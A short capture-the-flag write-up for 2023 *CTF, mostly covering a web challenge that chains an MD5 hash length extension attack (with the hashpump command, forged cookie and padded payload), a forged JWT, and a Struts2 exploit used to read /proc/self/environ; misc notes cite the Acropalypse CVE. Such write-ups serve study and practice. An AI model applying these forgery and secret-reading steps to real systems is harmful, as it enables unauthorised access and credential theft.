2023*CTF

web

jwt2struts

The page source hints at visiting JWT_key.php:

<?php
highlight_file(__FILE__);
include "./secret_key.php";
include "./salt.php";
//$salt = XXXXXXXXXXXXXX // the salt include 14 characters
//md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["digest"])) {
    if ($username === "admin" && $password != "root") {
        if ($_COOKIE["digest"] === md5($salt.$username.$password)) {
            die ("The secret_key is ". $secret_key);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("no no no");
    }
}

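At first I was thinking about how to brute-force this and did not think of a bypass; it turned out that the md5 check can be bypassed with a hash length extension attack. Reference: https://blog.csdn.net/LYJ20010728/article/details/116779357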

hashpump -s e6ccbf12de9d33ec27a5bcfb6a3293df -d adminroot -k 14 -a ddd

This gives:

Cookie: digest=9e2b0620d7214919beaea5998acdb7fd

username=%61%64%6d%69%6e&password=root%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b8%00%00%00%00%00%00%00ddd

This returns the key: sk-he001ctf3r

Forge the token with jwt.io: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MjAwNjIxNDE3N30.eoaKqDM23OT-iEZBhva5Yc-GKN876B9f-cbkqaQodgM


Then Struts2, exploited in one go:

cat /proc/self/environ

misc

snippingTools

CVE-2023-28303

https://github.com/frankthetank-music/Acropalypse-Multi-Tool


old language

Google reverse image search

https://zh.fonts2u.com/dovahkiin.%E5%AD%97%E4%BD%93


http://example.com/2023/08/27/2023starCTF/
Author: dddkia
Published: August 27, 2023